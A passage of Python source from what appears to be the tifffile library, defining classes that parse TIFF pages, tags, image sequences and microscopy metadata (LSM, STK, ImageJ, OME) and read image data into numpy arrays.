os.fstat(self._fh.fileno()) except Exception: # io.UnsupportedOperation return None @lazyattr def is_bigtiff(self): return self.offset_size != 4 @lazyattr def is_rgb(self): return all(p.is_rgb for p in self.pages) @lazyattr def is_palette(self): return all(p.is_palette for p in self.pages) @lazyattr def is_mdgel(self): return any(p.is_mdgel for p in self.pages) @lazyattr def is_mediacy(self): return any(p.is_mediacy for p in self.pages) @lazyattr def is_stk(self): return all(p.is_stk for p in self.pages) @lazyattr def is_lsm(self): return self.pages[0].is_lsm @lazyattr def is_imagej(self): return self.pages[0].is_imagej @lazyattr def is_micromanager(self): return self.pages[0].is_micromanager @lazyattr def is_nih(self): return self.pages[0].is_nih @lazyattr def is_fluoview(self): return self.pages[0].is_fluoview @lazyattr def is_ome(self): return self.pages[0].is_ome class TiffPage(object): """A TIFF image file directory (IFD). Attributes ---------- index : int Index of page in file. dtype : str {TIFF_SAMPLE_DTYPES} Data type of image, colormapped if applicable. shape : tuple Dimensions of the image array in TIFF page, colormapped and with one alpha channel if applicable. axes : str Axes label codes: 'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane, 'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda, 'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime, 'L' exposure, 'V' event, 'Q' unknown, '_' missing tags : TiffTags Dictionary of tags in page. Tag values are also directly accessible as attributes. color_map : numpy array Color look up table, if exists. cz_lsm_scan_info: Record(dict) LSM scan info attributes, if exists. imagej_tags: Record(dict) Consolidated ImageJ description and metadata tags, if exists. uic_tags: Record(dict) Consolidated MetaMorph STK/UIC tags, if exists. All attributes are read-only. Notes ----- The internal, normalized '_shape' attribute is 6 dimensional: 0. number planes (stk) 1. planar samples_per_pixel 2. image_depth Z (sgi) 3. image_length Y 4. image_width X 5. contig samples_per_pixel """ def __init__(self, parent): """Initialize instance from file.""" self.parent = parent self.index = len(parent.pages) self.shape = self._shape = () self.dtype = self._dtype = None self.axes = "" self.tags = TiffTags() self._fromfile() self._process_tags() def _fromfile(self): """Read TIFF IFD structure and its tags from file. File cursor must be at storage position of IFD offset and is left at offset to next IFD. Raises StopIteration if offset (first bytes read) is 0. """ fh = self.parent.filehandle byteorder = self.parent.byteorder offset_size = self.parent.offset_size fmt = {4: 'I', 8: 'Q'}[offset_size] offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0] if not offset: raise StopIteration() # read standard tags tags = self.tags fh.seek(offset) fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size] try: numtags = struct.unpack(byteorder + fmt, fh.read(size))[0] except Exception: warnings.warn("corrupted page list") raise StopIteration() tagcode = 0 for _ in range(numtags): try: tag = TiffTag(self.parent) # print(tag) except TiffTag.Error as e: warnings.warn(str(e)) continue if tagcode > tag.code: # expected for early LSM and tifffile versions warnings.warn("tags are not ordered by code") tagcode = tag.code if tag.name not in tags: tags[tag.name] = tag else: # some files contain multiple IFD with same code # e.g. 
MicroManager files contain two image_description i = 1 while True: name = "%s_%i" % (tag.name, i) if name not in tags: tags[name] = tag break pos = fh.tell() if self.is_lsm or (self.index and self.parent.is_lsm): # correct non standard LSM bitspersample tags self.tags['bits_per_sample']._correct_lsm_bitspersample(self) if self.is_lsm: # read LSM info subrecords for name, reader in CZ_LSM_INFO_READERS.items(): try: offset = self.cz_lsm_info['offset_'+name] except KeyError: continue if offset < 8: # older LSM revision continue fh.seek(offset) try: setattr(self, 'cz_lsm_'+name, reader(fh)) except ValueError: pass elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value: # read uic1tag now that plane count is known uic1tag = tags['uic1tag'] fh.seek(uic1tag.value_offset) tags['uic1tag'].value = Record( read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count, tags['uic2tag'].count)) fh.seek(pos) def _process_tags(self): """Validate standard tags and initialize attributes. Raise ValueError if tag values are not supported. """ tags = self.tags for code, (name, default, dtype, count, validate) in TIFF_TAGS.items(): if not (name in tags or default is None): tags[name] = TiffTag(code, dtype=dtype, count=count, value=default, name=name) if name in tags and validate: try: if tags[name].count == 1: setattr(self, name, validate[tags[name].value]) else: setattr(self, name, tuple( validate[value] for value in tags[name].value)) except KeyError: raise ValueError("%s.value (%s) not supported" % (name, tags[name].value)) tag = tags['bits_per_sample'] if tag.count == 1: self.bits_per_sample = tag.value else: # LSM might list more items than samples_per_pixel value = tag.value[:self.samples_per_pixel] if any((v-value[0] for v in value)): self.bits_per_sample = value else: self.bits_per_sample = value[0] tag = tags['sample_format'] if tag.count == 1: self.sample_format = TIFF_SAMPLE_FORMATS[tag.value] else: value = tag.value[:self.samples_per_pixel] if any((v-value[0] for v in value)): self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value] else: self.sample_format = TIFF_SAMPLE_FORMATS[value[0]] if 'photometric' not in tags: self.photometric = None if 'image_depth' not in tags: self.image_depth = 1 if 'image_length' in tags: self.strips_per_image = int(math.floor( float(self.image_length + self.rows_per_strip - 1) / self.rows_per_strip)) else: self.strips_per_image = 0 key = (self.sample_format, self.bits_per_sample) self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None) if 'image_length' not in self.tags or 'image_width' not in self.tags: # some GEL file pages are missing image data self.image_length = 0 self.image_width = 0 self.image_depth = 0 self.strip_offsets = 0 self._shape = () self.shape = () self.axes = '' if self.is_palette: self.dtype = self.tags['color_map'].dtype[1] self.color_map = numpy.array(self.color_map, self.dtype) dmax = self.color_map.max() if dmax < 256: self.dtype = numpy.uint8 self.color_map = self.color_map.astype(self.dtype) #else: # self.dtype = numpy.uint8 # self.color_map >>= 8 # self.color_map = self.color_map.astype(self.dtype) self.color_map.shape = (3, -1) # determine shape of data image_length = self.image_length image_width = self.image_width image_depth = self.image_depth samples_per_pixel = self.samples_per_pixel if self.is_stk: assert self.image_depth == 1 planes = self.tags['uic2tag'].count if self.is_contig: self._shape = (planes, 1, 1, image_length, image_width, samples_per_pixel) if samples_per_pixel == 1: self.shape = (planes, image_length, 
image_width) self.axes = 'YX' else: self.shape = (planes, image_length, image_width, samples_per_pixel) self.axes = 'YXS' else: self._shape = (planes, samples_per_pixel, 1, image_length, image_width, 1) if samples_per_pixel == 1: self.shape = (planes, image_length, image_width) self.axes = 'YX' else: self.shape = (planes, samples_per_pixel, image_length, image_width) self.axes = 'SYX' # detect type of series if planes == 1: self.shape = self.shape[1:] elif numpy.all(self.uic2tag.z_distance != 0): self.axes = 'Z' + self.axes elif numpy.all(numpy.diff(self.uic2tag.time_created) != 0): self.axes = 'T' + self.axes else: self.axes = 'I' + self.axes # DISABLED if self.is_palette: assert False, "color mapping disabled for stk" if self.color_map.shape[1] >= 2**self.bits_per_sample: if image_depth == 1: self.shape = (3, planes, image_length, image_width) else: self.shape = (3, planes, image_depth, image_length, image_width) self.axes = 'C' + self.axes else: warnings.warn("palette cannot be applied") self.is_palette = False elif self.is_palette: samples = 1 if 'extra_samples' in self.tags: samples += len(self.extra_samples) if self.is_contig: self._shape = (1, 1, image_depth, image_length, image_width, samples) else: self._shape = (1, samples, image_depth, image_length, image_width, 1) if self.color_map.shape[1] >= 2**self.bits_per_sample: if image_depth == 1: self.shape = (3, image_length, image_width) self.axes = 'CYX' else: self.shape = (3, image_depth, image_length, image_width) self.axes = 'CZYX' else: warnings.warn("palette cannot be applied") self.is_palette = False if image_depth == 1: self.shape = (image_length, image_width) self.axes = 'YX' else: self.shape = (image_depth, image_length, image_width) self.axes = 'ZYX' elif self.is_rgb or samples_per_pixel > 1: if self.is_contig: self._shape = (1, 1, image_depth, image_length, image_width, samples_per_pixel) if image_depth == 1: self.shape = (image_length, image_width, samples_per_pixel) self.axes = 'YXS' else: self.shape = (image_depth, image_length, image_width, samples_per_pixel) self.axes = 'ZYXS' else: self._shape = (1, samples_per_pixel, image_depth, image_length, image_width, 1) if image_depth == 1: self.shape = (samples_per_pixel, image_length, image_width) self.axes = 'SYX' else: self.shape = (samples_per_pixel, image_depth, image_length, image_width) self.axes = 'SZYX' if False and self.is_rgb and 'extra_samples' in self.tags: # DISABLED: only use RGB and first alpha channel if exists extra_samples = self.extra_samples if self.tags['extra_samples'].count == 1: extra_samples = (extra_samples, ) for exs in extra_samples: if exs in ('unassalpha', 'assocalpha', 'unspecified'): if self.is_contig: self.shape = self.shape[:-1] + (4,) else: self.shape = (4,) + self.shape[1:] break else: self._shape = (1, 1, image_depth, image_length, image_width, 1) if image_depth == 1: self.shape = (image_length, image_width) self.axes = 'YX' else: self.shape = (image_depth, image_length, image_width) self.axes = 'ZYX' if not self.compression and 'strip_byte_counts' not in tags: self.strip_byte_counts = ( product(self.shape) * (self.bits_per_sample // 8), ) assert len(self.shape) == len(self.axes) def asarray(self, squeeze=True, colormapped=True, rgbonly=False, scale_mdgel=False, memmap=False, reopen=True): """Read image data from file and return as numpy array. Raise ValueError if format is unsupported. If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default, the shape of the returned array might be different from the page shape. 
Parameters ---------- squeeze : bool If True, all length-1 dimensions (except X and Y) are squeezed out from result. colormapped : bool If True, color mapping is applied for palette-indexed images. rgbonly : bool If True, return RGB(A) image without additional extra samples. memmap : bool If True, use numpy.memmap to read arrays from file if possible. For use on 64 bit systems and files with few huge contiguous data. reopen : bool If True and the parent file handle is closed, the file is temporarily re-opened (and closed if no exception occurs). scale_mdgel : bool If True, MD Gel data will be scaled according to the private metadata in the second TIFF page. The dtype will be float32. """ if not self._shape: return if self.dtype is None: raise ValueError("data type not supported: %s%i" % ( self.sample_format, self.bits_per_sample)) if self.compression not in TIFF_DECOMPESSORS: raise ValueError("cannot decompress %s" % self.compression) tag = self.tags['sample_format'] if tag.count != 1 and any((i-tag.value[0] for i in tag.value)): raise ValueError("sample formats don't match %s" % str(tag.value)) fh = self.parent.filehandle closed = fh.closed if closed: if reopen: fh.open() else: raise IOError("file handle is closed") dtype = self._dtype shape = self._shape image_width = self.image_width image_length = self.image_length image_depth = self.image_depth typecode = self.parent.byteorder + dtype bits_per_sample = self.bits_per_sample if self.is_tiled: if 'tile_offsets' in self.tags: byte_counts = self.tile_byte_counts offsets = self.tile_offsets else: byte_counts = self.strip_byte_counts offsets = self.strip_offsets tile_width = self.tile_width tile_length = self.tile_length tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1 tw = (image_width + tile_width - 1) // tile_width tl = (image_length + tile_length - 1) // tile_length td = (image_depth + tile_depth - 1) // tile_depth shape = (shape[0], shape[1], td*tile_depth, tl*tile_length, tw*tile_width, shape[-1]) tile_shape = (tile_depth, tile_length, tile_width, shape[-1]) runlen = tile_width else: byte_counts = self.strip_byte_counts offsets = self.strip_offsets runlen = image_width if any(o < 2 for o in offsets): raise ValueError("corrupted page") if memmap and self._is_memmappable(rgbonly, colormapped): result = fh.memmap_array(typecode, shape, offset=offsets[0]) elif self.is_contiguous: fh.seek(offsets[0]) result = fh.read_array(typecode, product(shape)) result = result.astype('=' + dtype) else: if self.is_contig: runlen *= self.samples_per_pixel if bits_per_sample in (8, 16, 32, 64, 128): if (bits_per_sample * runlen) % 8: raise ValueError("data and sample size mismatch") def unpack(x): try: return numpy.fromstring(x, typecode) except ValueError as e: # strips may be missing EOI warnings.warn("unpack: %s" % e) xlen = ((len(x) // (bits_per_sample // 8)) * (bits_per_sample // 8)) return numpy.fromstring(x[:xlen], typecode) elif isinstance(bits_per_sample, tuple): def unpack(x): return unpackrgb(x, typecode, bits_per_sample) else: def unpack(x): return unpackints(x, typecode, bits_per_sample, runlen) decompress = TIFF_DECOMPESSORS[self.compression] if self.compression == 'jpeg': table = self.jpeg_tables if 'jpeg_tables' in self.tags else b'' decompress = lambda x: decodejpg(x, table, self.photometric) if self.is_tiled: result = numpy.empty(shape, dtype) tw, tl, td, pl = 0, 0, 0, 0 for offset, bytecount in zip(offsets, byte_counts): fh.seek(offset) tile = unpack(decompress(fh.read(bytecount))) tile.shape = tile_shape if 
self.predictor == 'horizontal': numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile) result[0, pl, td:td+tile_depth, tl:tl+tile_length, tw:tw+tile_width, :] = tile del tile tw += tile_width if tw >= shape[4]: tw, tl = 0, tl + tile_length if tl >= shape[3]: tl, td = 0, td + tile_depth if td >= shape[2]: td, pl = 0, pl + 1 result = result[..., :image_depth, :image_length, :image_width, :] else: strip_size = (self.rows_per_strip * self.image_width * self.samples_per_pixel) result = numpy.empty(shape, dtype).reshape(-1) index = 0 for offset, bytecount in zip(offsets, byte_counts): fh.seek(offset) strip = fh.read(bytecount) strip = decompress(strip) strip = unpack(strip) size = min(result.size, strip.size, strip_size, result.size - index) result[index:index+size] = strip[:size] del strip index += size result.shape = self._shape if self.predictor == 'horizontal' and not (self.is_tiled and not self.is_contiguous): # work around bug in LSM510 software if not (self.parent.is_lsm and not self.compression): numpy.cumsum(result, axis=-2, dtype=dtype, out=result) if colormapped and self.is_palette: if self.color_map.shape[1] >= 2**bits_per_sample: # FluoView and LSM might fail here result = numpy.take(self.color_map, result[:, 0, :, :, :, 0], axis=1) elif rgbonly and self.is_rgb and 'extra_samples' in self.tags: # return only RGB and first alpha channel if exists extra_samples = self.extra_samples if self.tags['extra_samples'].count == 1: extra_samples = (extra_samples, ) for i, exs in enumerate(extra_samples): if exs in ('unassalpha', 'assocalpha', 'unspecified'): if self.is_contig: result = result[..., [0, 1, 2, 3+i]] else: result = result[:, [0, 1, 2, 3+i]] break else: if self.is_contig: result = result[..., :3] else: result = result[:, :3] if squeeze: try: result.shape = self.shape except ValueError: warnings.warn("failed to reshape from %s to %s" % ( str(result.shape), str(self.shape))) if scale_mdgel and self.parent.is_mdgel: # MD Gel stores private metadata in the second page tags = self.parent.pages[1] if tags.md_file_tag in (2, 128): scale = tags.md_scale_pixel scale = scale[0] / scale[1] # rational result = result.astype('float32') if tags.md_file_tag == 2: result **= 2 # squary root data format result *= scale if closed: # TODO: file remains open if an exception occurred above fh.close() return result def _is_memmappable(self, rgbonly, colormapped): """Return if image data in file can be memory mapped.""" if not self.parent.filehandle.is_file or not self.is_contiguous: return False return not (self.predictor or (rgbonly and 'extra_samples' in self.tags) or (colormapped and self.is_palette) or ({'big': '>', 'little': '<'}[sys.byteorder] != self.parent.byteorder)) @lazyattr def is_contiguous(self): """Return offset and size of contiguous data, else None. Excludes prediction and colormapping. 
""" if self.compression or self.bits_per_sample not in (8, 16, 32, 64): return if self.is_tiled: if (self.image_width != self.tile_width or self.image_length % self.tile_length or self.tile_width % 16 or self.tile_length % 16): return if ('image_depth' in self.tags and 'tile_depth' in self.tags and (self.image_length != self.tile_length or self.image_depth % self.tile_depth)): return offsets = self.tile_offsets byte_counts = self.tile_byte_counts else: offsets = self.strip_offsets byte_counts = self.strip_byte_counts if len(offsets) == 1: return offsets[0], byte_counts[0] if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1] or byte_counts[i+1] == 0 # no data/ignore offset for i in range(len(offsets)-1)): return offsets[0], sum(byte_counts) def __str__(self): """Return string containing information about page.""" s = ', '.join(s for s in ( ' x '.join(str(i) for i in self.shape), str(numpy.dtype(self.dtype)), '%s bit' % str(self.bits_per_sample), self.photometric if 'photometric' in self.tags else '', self.compression if self.compression else 'raw', '|'.join(t[3:] for t in ( 'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej', 'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy', 'is_sgi', 'is_reduced', 'is_tiled', 'is_contiguous') if getattr(self, t))) if s) return "Page %i: %s" % (self.index, s) def __getattr__(self, name): """Return tag value.""" if name in self.tags: value = self.tags[name].value setattr(self, name, value) return value raise AttributeError(name) @lazyattr def uic_tags(self): """Consolidate UIC tags.""" if not self.is_stk: raise AttributeError("uic_tags") tags = self.tags result = Record() result.number_planes = tags['uic2tag'].count if 'image_description' in tags: result.plane_descriptions = self.image_description.split(b'\x00') if 'uic1tag' in tags: result.update(tags['uic1tag'].value) if 'uic3tag' in tags: result.update(tags['uic3tag'].value) # wavelengths if 'uic4tag' in tags: result.update(tags['uic4tag'].value) # override uic1 tags uic2tag = tags['uic2tag'].value result.z_distance = uic2tag.z_distance result.time_created = uic2tag.time_created result.time_modified = uic2tag.time_modified try: result.datetime_created = [ julian_datetime(*dt) for dt in zip(uic2tag.date_created, uic2tag.time_created)] result.datetime_modified = [ julian_datetime(*dt) for dt in zip(uic2tag.date_modified, uic2tag.time_modified)] except ValueError as e: warnings.warn("uic_tags: %s" % e) return result @lazyattr def imagej_tags(self): """Consolidate ImageJ metadata.""" if not self.is_imagej: raise AttributeError("imagej_tags") tags = self.tags if 'image_description_1' in tags: # MicroManager result = imagej_description(tags['image_description_1'].value) else: result = imagej_description(tags['image_description'].value) if 'imagej_metadata' in tags: try: result.update(imagej_metadata( tags['imagej_metadata'].value, tags['imagej_byte_counts'].value, self.parent.byteorder)) except Exception as e: warnings.warn(str(e)) return Record(result) @lazyattr def is_rgb(self): """True if page contains a RGB image.""" return ('photometric' in self.tags and self.tags['photometric'].value == 2) @lazyattr def is_contig(self): """True if page contains a contiguous image.""" return ('planar_configuration' in self.tags and self.tags['planar_configuration'].value == 1) @lazyattr def is_palette(self): """True if page contains a palette-colored image and not OME or STK.""" try: # turn off color mapping for OME-TIFF and STK if self.is_stk or self.is_ome or self.parent.is_ome: return False except 
IndexError: pass # OME-XML not found in first page return ('photometric' in self.tags and self.tags['photometric'].value == 3) @lazyattr def is_tiled(self): """True if page contains tiled image.""" return 'tile_width' in self.tags @lazyattr def is_reduced(self): """True if page is a reduced image of another image.""" return bool(self.tags['new_subfile_type'].value & 1) @lazyattr def is_mdgel(self): """True if page contains md_file_tag tag.""" return 'md_file_tag' in self.tags @lazyattr def is_mediacy(self): """True if page contains Media Cybernetics Id tag.""" return ('mc_id' in self.tags and self.tags['mc_id'].value.startswith(b'MC TIFF')) @lazyattr def is_stk(self): """True if page contains UIC2Tag tag.""" return 'uic2tag' in self.tags @lazyattr def is_lsm(self): """True if page contains LSM CZ_LSM_INFO tag.""" return 'cz_lsm_info' in self.tags @lazyattr def is_fluoview(self): """True if page contains FluoView MM_STAMP tag.""" return 'mm_stamp' in self.tags @lazyattr def is_nih(self): """True if page contains NIH image header.""" return 'nih_image_header' in self.tags @lazyattr def is_sgi(self): """True if page contains SGI image and tile depth tags.""" return 'image_depth' in self.tags and 'tile_depth' in self.tags @lazyattr def is_ome(self): """True if page contains OME-XML in image_description tag.""" return ('image_description' in self.tags and self.tags[ 'image_description'].value.startswith(b'<?xml version=')) @lazyattr def is_shaped(self): """True if page contains shape in image_description tag.""" return ('image_description' in self.tags and self.tags[ 'image_description'].value.startswith(b'shape=(')) @lazyattr def is_imagej(self): """True if page contains ImageJ description.""" return ( ('image_description' in self.tags and self.tags['image_description'].value.startswith(b'ImageJ=')) or ('image_description_1' in self.tags and # Micromanager self.tags['image_description_1'].value.startswith(b'ImageJ='))) @lazyattr def is_micromanager(self): """True if page contains Micro-Manager metadata.""" return 'micromanager_metadata' in self.tags class TiffTag(object): """A TIFF tag structure. Attributes ---------- name : string Attribute name of tag. code : int Decimal code of tag. dtype : str Datatype of tag data. One of TIFF_DATA_TYPES. count : int Number of values. value : various types Tag data as Python object. value_offset : int Location of value in file, if any. All attributes are read-only. """ __slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset', '_offset', '_value', '_type') class Error(Exception): pass def __init__(self, arg, **kwargs): """Initialize instance from file or arguments.""" self._offset = None if hasattr(arg, '_fh'): self._fromfile(arg, **kwargs) else: self._fromdata(arg, **kwargs) def _fromdata(self, code, dtype, count, value, name=None): """Initialize instance from arguments.""" self.code = int(code) self.name = name if name else str(code) self.dtype = TIFF_DATA_TYPES[dtype] self.count = int(count) self.value = value self._value = value self._type = dtype def _fromfile(self, parent): """Read tag structure from open file. 
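
# Illustrative sketch: TiffTag can also be built directly from values via
# the _fromdata path above.  The dtype argument is a TIFF_DATA_TYPES key
# (4 == LONG), not a numpy dtype; value_offset is only set when a tag is
# read from a file.
def _demo_tifftag_fromdata():
    """Create an image_width tag from literal values."""
    tag = TiffTag(256, dtype=4, count=1, value=1024, name='image_width')
    return tag.code, tag.name, tag.dtype, tag.value
    # (256, 'image_width', '1I', 1024)
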
Advance file cursor.""" fh = parent.filehandle byteorder = parent.byteorder self._offset = fh.tell() self.value_offset = self._offset + parent.offset_size + 4 fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size] data = fh.read(size) code, dtype = struct.unpack(byteorder + fmt[:2], data[:4]) count, value = struct.unpack(byteorder + fmt[2:], data[4:]) self._value = value self._type = dtype if code in TIFF_TAGS: name = TIFF_TAGS[code][0] elif code in CUSTOM_TAGS: name = CUSTOM_TAGS[code][0] else: name = str(code) try: dtype = TIFF_DATA_TYPES[self._type] except KeyError: raise TiffTag.Error("unknown tag data type %i" % self._type) fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1]) size = struct.calcsize(fmt) if size > parent.offset_size or code in CUSTOM_TAGS: pos = fh.tell() tof = {4: 'I', 8: 'Q'}[parent.offset_size] self.value_offset = offset = struct.unpack(byteorder+tof, value)[0] if offset < 0 or offset > parent.filehandle.size: raise TiffTag.Error("corrupt file - invalid tag value offset") elif offset < 4: raise TiffTag.Error("corrupt value offset for tag %i" % code) fh.seek(offset) if code in CUSTOM_TAGS: readfunc = CUSTOM_TAGS[code][1] value = readfunc(fh, byteorder, dtype, count) if isinstance(value, dict): # numpy.core.records.record value = Record(value) elif code in TIFF_TAGS or dtype[-1] == 's': value = struct.unpack(fmt, fh.read(size)) else: value = read_numpy(fh, byteorder, dtype, count) fh.seek(pos) else: value = struct.unpack(fmt, value[:size]) if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325): # scalar value if not strip/tile offsets/byte_counts if len(value) == 1: value = value[0] if (dtype.endswith('s') and isinstance(value, bytes) and self._type != 7): # TIFF ASCII fields can contain multiple strings, # each terminated with a NUL value = stripascii(value) self.code = code self.name = name self.dtype = dtype self.count = count self.value = value def _correct_lsm_bitspersample(self, parent): """Correct LSM bitspersample tag. Old LSM writers may use a separate region for two 16-bit values, although they fit into the tag value element of the tag. """ if self.code == 258 and self.count == 2: # TODO: test this. Need example file. warnings.warn("correcting LSM bitspersample tag") fh = parent.filehandle tof = {4: '<I', 8: '<Q'}[parent.offset_size] self.value_offset = struct.unpack(tof, self._value)[0] fh.seek(self.value_offset) self.value = struct.unpack("<HH", fh.read(4)) def as_str(self): """Return value as human readable string.""" return ((str(self.value).split('\n', 1)[0]) if (self._type != 7) else '<undefined>') def __str__(self): """Return string containing information about tag.""" return ' '.join(str(getattr(self, s)) for s in self.__slots__) class TiffSequence(object): """Sequence of image files. The data shape and dtype of all files must match. Properties ---------- files : list List of file names. shape : tuple Shape of image sequence. axes : str Labels of axes in shape. Examples -------- >>> tifs = TiffSequence("test.oif.files/*.tif") >>> tifs.shape, tifs.axes ((2, 100), 'CT') >>> data = tifs.asarray() >>> data.shape (2, 100, 256, 256) """ _patterns = { 'axes': r""" # matches Olympus OIF and Leica TIFF series _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4})) _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? 
"""} class ParseError(Exception): pass def __init__(self, files, imread=TiffFile, pattern='axes', *args, **kwargs): """Initialize instance from multiple files. Parameters ---------- files : str, or sequence of str Glob pattern or sequence of file names. imread : function or class Image read function or class with asarray function returning numpy array from single file. pattern : str Regular expression pattern that matches axes names and sequence indices in file names. By default this matches Olympus OIF and Leica TIFF series. """ if isinstance(files, basestring): files = natural_sorted(glob.glob(files)) files = list(files) if not files: raise ValueError("no files found") #if not os.path.isfile(files[0]): # raise ValueError("file not found") self.files = files if hasattr(imread, 'asarray'): # redefine imread _imread = imread def imread(fname, *args, **kwargs): with _imread(fname) as im: return im.asarray(*args, **kwargs) self.imread = imread self.pattern = self._patterns.get(pattern, pattern) try: self._parse() if not self.axes: self.axes = 'I' except self.ParseError: self.axes = 'I' self.shape = (len(files),) self._start_index = (0,) self._indices = tuple((i,) for i in range(len(files))) def __str__(self): """Return string with information about image sequence.""" return "\n".join([ self.files[0], '* files: %i' % len(self.files), '* axes: %s' % self.axes, '* shape: %s' % str(self.shape)]) def __len__(self): return len(self.files) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def close(self): pass def asarray(self, memmap=False, *args, **kwargs): """Read image data from all files and return as single numpy array. If memmap is True, return an array stored in a binary file on disk. The args and kwargs parameters are passed to the imread function. Raise IndexError or ValueError if image shapes don't match. """ im = self.imread(self.files[0], *args, **kwargs) shape = self.shape + im.shape if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=im.dtype, shape=shape) else: result = numpy.zeros(shape, dtype=im.dtype) result = result.reshape(-1, *im.shape) for index, fname in zip(self._indices, self.files): index = [i-j for i, j in zip(index, self._start_index)] index = numpy.ravel_multi_index(index, self.shape) im = self.imread(fname, *args, **kwargs) result[index] = im result.shape = shape return result def _parse(self): """Get axes and shape from file names.""" if not self.pattern: raise self.ParseError("invalid pattern") pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE) matches = pattern.findall(self.files[0]) if not matches: raise self.ParseError("pattern doesn't match file names") matches = matches[-1] if len(matches) % 2: raise self.ParseError("pattern doesn't match axis name and index") axes = ''.join(m for m in matches[::2] if m) if not axes: raise self.ParseError("pattern doesn't match file names") indices = [] for fname in self.files: matches = pattern.findall(fname)[-1] if axes != ''.join(m for m in matches[::2] if m): raise ValueError("axes don't match within the image sequence") indices.append([int(m) for m in matches[1::2] if m]) shape = tuple(numpy.max(indices, axis=0)) start_index = tuple(numpy.min(indices, axis=0)) shape = tuple(i-j+1 for i, j in zip(shape, start_index)) if product(shape) != len(self.files): warnings.warn("files are missing. 
Missing data are zeroed") self.axes = axes.upper() self.shape = shape self._indices = indices self._start_index = start_index class Record(dict): """Dictionary with attribute access. Can also be initialized with numpy.core.records.record. """ __slots__ = () def __init__(self, arg=None, **kwargs): if kwargs: arg = kwargs elif arg is None: arg = {} try: dict.__init__(self, arg) except (TypeError, ValueError): for i, name in enumerate(arg.dtype.names): v = arg[i] self[name] = v if v.dtype.char != 'S' else stripnull(v) def __getattr__(self, name): return self[name] def __setattr__(self, name, value): self.__setitem__(name, value) def __str__(self): """Pretty print Record.""" s = [] lists = [] for k in sorted(self): try: if k.startswith('_'): # does not work with byte continue except AttributeError: pass v = self[k] if isinstance(v, (list, tuple)) and len(v): if isinstance(v[0], Record): lists.append((k, v)) continue elif isinstance(v[0], TiffPage): v = [i.index for i in v if i] s.append( ("* %s: %s" % (k, str(v))).split("\n", 1)[0] [:PRINT_LINE_LEN].rstrip()) for k, v in lists: l = [] for i, w in enumerate(v): l.append("* %s[%i]\n %s" % (k, i, str(w).replace("\n", "\n "))) s.append('\n'.join(l)) return '\n'.join(s) class TiffTags(Record): """Dictionary of TiffTag with attribute access.""" def __str__(self): """Return string with information about all tags.""" s = [] for tag in sorted(self.values(), key=lambda x: x.code): typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1]) line = "* %i %s (%s) %s" % ( tag.code, tag.name, typecode, tag.as_str()) s.append(line[:PRINT_LINE_LEN].lstrip()) return '\n'.join(s) class FileHandle(object): """Binary file handle. * Handle embedded files (for CZI within CZI files). * Allow to re-open closed files (for multi file formats such as OME-TIFF). * Read numpy arrays and records from file like objects. Only binary read, seek, tell, and close are supported on embedded files. When initialized from another file handle, do not use it unless this FileHandle is closed. Attributes ---------- name : str Name of the file. path : str Absolute path to file. size : int Size of file in bytes. is_file : bool If True, file has a filno and can be memory mapped. All attributes are read-only. """ __slots__ = ('_fh', '_arg', '_mode', '_name', '_dir', '_offset', '_size', '_close', 'is_file') def __init__(self, arg, mode='rb', name=None, offset=None, size=None): """Initialize file handle from file name or another file handle. Parameters ---------- arg : str, File, or FileHandle File name or open file handle. mode : str File open mode in case 'arg' is a file name. name : str Optional name of file in case 'arg' is a file handle. offset : int Optional start position of embedded file. By default this is the current file position. size : int Optional size of embedded file. By default this is the number of bytes from the 'offset' to the end of the file. 
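
# Example: Record above gives dictionary entries attribute access, which
# the metadata readers later in this module rely on.
def _demo_record():
    """Show equivalent item and attribute access on Record."""
    rec = Record({'width': 640})
    rec.height = 480                  # same as rec['height'] = 480
    return rec.width, rec['height']   # (640, 480)
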
""" self._fh = None self._arg = arg self._mode = mode self._name = name self._dir = '' self._offset = offset self._size = size self._close = True self.is_file = False self.open() def open(self): """Open or re-open file.""" if self._fh: return # file is open if isinstance(self._arg, basestring): # file name self._arg = os.path.abspath(self._arg) self._dir, self._name = os.path.split(self._arg) self._fh = open(self._arg, self._mode) self._close = True if self._offset is None: self._offset = 0 elif isinstance(self._arg, FileHandle): # FileHandle self._fh = self._arg._fh if self._offset is None: self._offset = 0 self._offset += self._arg._offset self._close = False if not self._name: if self._offset: name, ext = os.path.splitext(self._arg._name) self._name = "%s@%i%s" % (name, self._offset, ext) else: self._name = self._arg._name self._dir = self._arg._dir else: # open file object self._fh = self._arg if self._offset is None: self._offset = self._arg.tell() self._close = False if not self._name: try: self._dir, self._name = os.path.split(self._fh.name) except AttributeError: self._name = "Unnamed stream" if self._offset: self._fh.seek(self._offset) if self._size is None: pos = self._fh.tell() self._fh.seek(self._offset, 2) self._size = self._fh.tell() self._fh.seek(pos) try: 